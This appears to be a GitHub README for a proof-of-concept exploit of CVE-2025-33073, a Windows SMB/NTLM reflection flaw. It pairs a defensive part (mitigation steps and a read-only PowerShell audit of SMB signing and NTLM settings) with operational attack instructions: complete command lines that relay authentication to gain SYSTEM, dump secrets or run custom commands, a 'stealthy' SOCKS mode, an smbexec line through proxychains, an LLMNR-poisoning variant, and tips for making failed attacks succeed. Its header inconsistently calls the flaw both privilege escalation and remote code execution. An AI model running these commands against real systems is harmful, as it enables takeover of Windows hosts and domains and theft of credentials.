CVE-2025-33073 PoC — Windows SMB Client Elevation of Privilege Vulnerability

Title: Windows SMB Client Elevation of Privilege Vulnerability (CVE-2025-33073)
Description: Improper access control in Windows SMB allows an authorized attacker to elevate privileges over a network.
# ✨ CVE-2025-33073: Windows SMB RCE Vulnerability 🚨

🔥 **High-Severity Authenticated Remote Code Execution** 🔥 Improper Access Control in Windows SMB Client (CWE-284)

---

## 🛡️ **Key Details at a Glance**

| **Aspect**               | **Details**                                                                 |
|--------------------------|-----------------------------------------------------------------------------|
| **CVSS v3.1 Score**      | **8.8 (High)** 🔥                                                         |
| **Affected Systems**     | Windows 10, 11, Server 2012–2025 (all editions) 💻                        |
| **Disclosure Date**      | June 10, 2025 📅 (Patched in **June 2025 Patch Tuesday**)               |
| **Exploitation**         | **Actively exploited in the wild** 😱<br>Added to **CISA KEV** on Oct 21, 2025 |
| **Attack Vector**        | Network (Authenticated) 🌐                                               |
| **Impact**               | **SYSTEM-level code execution** 👑<br>Lateral movement via Kerberos relay |
| **Bypass**               | NTLM reflection mitigations ⚡                                           |

---

## 🛠️ **Immediate Mitigations**

1. **Patch Now!** 🔧  
   → Apply Microsoft updates (e.g., **KB5060998**)  
   → [Microsoft Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073) 🔗

2. **Enable SMB Signing** ✍️  
   → Enforce on **all clients & servers**  
   → `Set-SmbClientConfiguration -RequireSecuritySignature $true`

3. **Restrict NTLM** 🚫  
   → Block NTLM where possible  
   → Monitor for relay attempts with EDR tools

4. **Automated Fix?** 🤖  
   → Use **Vicarius vRx** or custom scripts for mass remediation
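The three mitigations above can be checked in one pass. The following audit script is an added example, not part of the PoC repository or of any Microsoft tooling; it only reads settings (it changes nothing), assumes it is run elevated on the host being checked, and treats the KB5060998 lookup as a hint only, since the June 2025 update carries a different KB number per Windows build.

```powershell
# Added audit script (not part of the PoC repository). Assumptions: run elevated on the host
# being checked; KB5060998 is only one of several June 2025 update IDs, so its absence is a
# hint to verify the build-specific cumulative update, not proof the host is unpatched.
function Test-SmbNtlmHardening {
    $findings = @()

    # 1. SMB signing: both the client and the server side must require signatures
    $client = Get-SmbClientConfiguration
    $server = Get-SmbServerConfiguration
    if (-not $client.RequireSecuritySignature) {
        $findings += 'SMB client does not require signing (Set-SmbClientConfiguration -RequireSecuritySignature $true)'
    }
    if (-not $server.RequireSecuritySignature) {
        $findings += 'SMB server does not require signing (Set-SmbServerConfiguration -RequireSecuritySignature $true -Force)'
    }

    # 2. NTLM restriction: RestrictSendingNTLMTraffic 0 = allow, 1 = audit, 2 = deny all outgoing NTLM
    $msv = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
    $restrict = (Get-ItemProperty -Path $msv -Name RestrictSendingNTLMTraffic -ErrorAction SilentlyContinue).RestrictSendingNTLMTraffic
    if ($null -eq $restrict -or $restrict -lt 2) {
        $shown = if ($null -eq $restrict) { 'not set' } else { $restrict }
        $findings += "Outgoing NTLM is not blocked (RestrictSendingNTLMTraffic = $shown; 2 = deny)"
    }
    # LmCompatibilityLevel 5 = send NTLMv2 only and refuse LM/NTLMv1 as a server
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $lmLevel = (Get-ItemProperty -Path $lsa -Name LmCompatibilityLevel -ErrorAction SilentlyContinue).LmCompatibilityLevel
    if ($null -eq $lmLevel -or $lmLevel -lt 5) {
        $shown = if ($null -eq $lmLevel) { 'not set' } else { $lmLevel }
        $findings += "LmCompatibilityLevel = $shown (5 = NTLMv2 only, refuse LM and NTLMv1)"
    }

    # 3. Patch presence: the KB named in this README; verify the build-specific update as well
    if (-not (Get-HotFix -Id 'KB5060998' -ErrorAction SilentlyContinue)) {
        $findings += 'KB5060998 not installed (check the June 2025 cumulative update for this build)'
    }

    return $findings
}

$result = Test-SmbNtlmHardening
if ($result.Count -eq 0) {
    'OK: SMB signing required on client and server, outgoing NTLM denied, patch present'
} else {
    $result | ForEach-Object { "FINDING: $_" }
}
```

Each finding names the setting that is still weak together with the value the mitigation list asks for, so the output doubles as a remediation checklist for that host.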

---

## ⚠️ **Why It Matters**
- Bypasses traditional NTLM protections 🛑  
- Works even with SMB signing **not enforced**  
- Enables **full domain takeover** in misconfigured AD environments 🏰

---

> **Status as of November 15, 2025**:  
> ✅ Patched  
> ❌ **Still exploited in unpatched systems**  
> 🔔 **CISA Deadline: Nov 10, 2025** ⏰

---


## ⚠️ **Example usage**

#### **GUI**

```
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
```

<img width="1905" height="697" alt="454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c" src="https://github.com/user-attachments/assets/27c67345-41b0-4d57-a30f-1971b9f00498" />

---
#### **CLI**

```
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
```

<img width="1593" height="612" alt="455126200-fff4fcde-0a93-43c9-b93e-990554ccb689" src="https://github.com/user-attachments/assets/4110dcb8-d712-4b02-aa55-d81459abb10d" />

---

**Custom command**
Instead of running secretsdump a custom command can be executed.

```
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
```

<img width="1456" height="389" alt="455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534" src="https://github.com/user-attachments/assets/cba92836-e8a6-4291-abd3-c14cb08e3373" />

**SOCKS**
For more stealthy execution of commands after a valid connection as SYSTEM has been established. `--target` and `--target-ip` should be equal here.

```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
```

<img width="1635" height="697" alt="455140618-8cf77803-f417-4abe-a993-746049b2634c" src="https://github.com/user-attachments/assets/56dfb7e3-245c-4851-a781-8b35a6661b1a" />

A custom command can also be run through proxychains instead of dumping the SAM.

```
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
```

<img width="1123" height="98" alt="455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea" src="https://github.com/user-attachments/assets/dfdd9feb-0962-4999-b46a-03f28c305a47" />

---

#### Manual exploit without DNS requirement

If you're in the same broadcast domain as the device and it's vulnerable to LLMNR poisoning, it's possible to exploit it without having to register a DNS record.

<img width="1920" height="713" alt="455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1" src="https://github.com/user-attachments/assets/43945419-144d-463a-9059-eef477d00aca" />

#### Troubleshooting:

+ I've seen the attack not work sometimes because the hostname is used for the attack, which results in a DNS lookup from Kali. If Kali is not using the DNS server or you get a '/ FAILED' message from impacket-ntlmrelayx, try adding the host to your /etc/hosts file. This should result in the attack working.

+ If using the IP, the attack should work. Sometimes running it multiple times will result in a SUCCESS instead of a failure. It's not yet perfectly clear why this happens; I think it has something to do with networking.
  
+ Try another coerce method using -M or --method.

---

#### Wireshark:

Local NTLM authentication takes place

<img width="1368" height="813" alt="455252866-0a3fe643-2d52-427a-91f2-991770732f62" src="https://github.com/user-attachments/assets/17a623d1-8bb6-4c2a-b600-e1df10843d34" />

Local NTLM authentication does not take place, resulting in a FAILED attempt

<img width="1360" height="820" alt="455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348" src="https://github.com/user-attachments/assets/7edcbfa7-6012-441f-a6da-0a2756ef51b8" />

---

### Good to know:

+ xterm allows copying and pasting with the middle mouse button.
+ The DNS record should also be known to the client; in some cases this can take more time. By more time I mean a couple of minutes.
+ This is just a PoC, which means no AV/EDR bypasses have been attempted. Use at your own risk.


---
**Don’t wait — patch today!** 🛑  
*Your network’s security depends on it.* 💪